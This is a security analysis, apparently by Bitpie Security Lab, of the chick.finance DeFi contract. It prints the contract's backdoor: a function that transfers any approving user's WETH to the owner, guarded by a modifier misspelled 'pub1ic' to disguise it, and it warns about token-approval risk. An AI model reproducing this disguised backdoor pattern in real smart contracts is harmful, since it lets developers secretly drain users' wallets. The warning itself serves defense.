Detailed analysis of the malicious contract code of the Defi liquidity mining project chick.finance
Yesterday, YFII notified the risk of the chick.finance contract code, the sentence “all tokens recharged by the user, the developer has the authority to withdraw” is not completely accurate, so here we want to share a more detailed description to everyone.
The problem with the malicious code of the contract is not about “the developer can access the tokens from the user’s contract” (the developer can do this in the first place), but any user authorized to the contract, the developer can wipe out the tokens in your wallet (not just what you deposit into the contract). This is exactly what Bitpie Security Lab wrote in the previous article “The biggest security risk of the Ethereum Defi ecosystem” The contract authorization issues” we mentioned.
Here is the malicious code:
function startReward(address _from, uint256 amount) external pub1ic{
weth.safeTransferFrom(_from, owner(), amount);
}
The developer has made the following constraints with the deliberately misspelled code(that is only the contract owner can call it. If there is no such call, then everyone can do it. The developer wants to steal it by himself)
modifier pub1ic() {
require(isOwner(), “Ownable: caller is not the owner”);
_;
}
The logic of the above code is very simple. It is for users who have authorized this contract. The contract owner can transfer your tokens to them. Really simple.
This is actually a very serious issue in the Defi ecosystem, which should attract the attention of the entire industry, because this time malicious developers may just use spelling mistakes to fool everyone (write public as pub1ic). It’s very lucky to find that this time, but what about next? It is possible to write complex code in logic and difficult to be seen, and wait quietly to take it away from your wallets? It should be emphasized again, you lose is not only the assets you deposited into the contract but all the assets in your wallet.
When we raised the issue of “contract authorization” to the entire industry, we expected that developers might do evil. We did not expect this day to come so quickly. This time the code disguise is rather findable. However, will the Defi miners be able to avoid it next time?
Bitpie Security Lab
